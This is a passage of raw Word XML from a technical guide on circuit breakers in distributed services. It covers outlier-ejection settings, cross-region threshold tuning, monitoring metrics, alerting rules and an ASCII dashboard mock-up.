    <w:p w14:paraId="05340EAE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  base_ejection_time: 30s                # Ejection duration (increases with repeated ejections)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3923D665" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  max_ejection_percent: 50               # Never eject more than 50% of hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE4A879" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  success_rate_minimum_hosts: 3          # Need 3 hosts for statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15200440" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  success_rate_request_volume: 100       # Need 100 requests for statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084FBA02" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  success_rate_stdev_factor: 1900        # Eject hosts 1.9 std devs below mean success rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759F9F63" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The max_ejection_percent is critical:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B28FCE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Never eject ALL hosts (that would mean zero capacity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6843889B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Even if all hosts are failing, keep 50% in rotation (at least some requests might succeed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DC9A0C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Prevents the circuit breaker itself from causing a complete outage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070E7BE1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.3 Circuit Breaker Across Network Boundaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B31F16" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-region circuit breaking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBC703D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Service in US-East calls service in EU-West:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2ABC3C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Network latency: 100ms baseline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11842F1A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Under normal conditions, a 5-second timeout works fine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170FC21A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Under network degradation, latency might spike to 3 seconds (not a failure, just slow).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52962820" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit breaker thresholds must account for higher baseline latency and jitter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658E34CE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configuration adjustments for cross-region:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8CB33B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Higher slow-call threshold (3 seconds instead of 500ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC4A397" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Larger sliding window (network jitter creates short bursts that shouldn't trip the breaker).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C4CACC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Lower failure rate threshold (cross-region calls are more expensive; want to fail fast).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A4C029" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Longer wait duration in open state (cross-region recovery typically takes longer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206CCCBF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="2C90CE41">
          <v:rect id="_x0000_i4253" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F78BCA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. Monitoring and Observability for Circuit Breakers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBA740A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.1 Essential Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B026B30" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>State metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D6FC30" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>circuit_breaker_state{service="payment"} = closed/open/half_open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0095788F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Duration in each state (how long was the circuit open?).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013EC57E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Number of state transitions per time period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602B2773" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Time since last state change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72954059" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Throughput metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D2988E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1059"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Requests permitted (passed through circuit breaker).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44337419" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1059"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Requests rejected (blocked by open circuit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F9CE3C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1059"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Rejection rate = rejected / (permitted + rejected).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E697D87" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failure metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3001AAEA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1060"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Failure rate within the sliding window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B06AB0C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1060"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Slow call rate within the sliding window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DCD59B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1060"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Not-permitted call rate (calls rejected while open).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FB8AE1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recovery metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580B9EF9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1061"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Half-open probe success/failure count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DE8A00" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1061"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Time to recovery (duration from open → closed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04611026" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1061"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Recovery attempts before success (number of half-open → open cycles before final close).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB535BC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.2 Alerting Strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DB1C0E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Alert on state change (information):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D005C0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>"Payment service circuit breaker opened" — someone should know.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B796739" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Not necessarily a page (if fallback is working), but a notification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B79D2B2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Alert on sustained open state (actionable):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B94BA19" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>"Payment service circuit breaker has been open for &gt; 5 minutes" — human intervention may be needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B43D33" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The downstream might need manual recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649CD1D9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Alert on high rejection rate (impact):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2B69A4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>"50% of payment requests being rejected by circuit breaker" — users are affected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F80A36C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Even with fallback, this indicates significant degradation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350A6756" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Alert on flapping (instability):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2B26E1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>"Circuit breaker has transitioned 10 times in the last 5 minutes" — the system is unstable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717F815E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1065"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Might indicate: threshold is too sensitive, intermittent network issue, or a service that's oscillating between healthy and unhealthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4392E843" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>12.3 Dashboard Visualization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E52894" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The ideal circuit breaker dashboard shows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7352B896" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47805864" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>┌─────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CBBE96" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│ Circuit Breaker: PaymentService                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205B3432" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│                                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EE2260" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">│ State: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>██</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve"> OPEN (since 2m 15s ago)               </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA9B043" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│                                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DBF00E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">│ Failure Rate: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>████████████████░░░░</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve"> 78%          </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B950A5A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">│ Slow Call Rate: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>██████░░░░░░░░░░░░</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve"> 32%          </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBADA30" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│                                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5145D1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│ Permitted/Rejected:                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF04FCC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">│ </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>████</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve"> Permitted: 45/s                            </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24321C1A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">│ </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>████████████████</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve"> Rejected: 955/s                </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316CE6DD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│                                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E188D3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>│ Timeline:                                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4AC6A5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">│ CLOSED </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▓▓▓▓▓▓▓▓▓▓▓▓▓</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve"> OPEN </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>░░░░░░░░</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
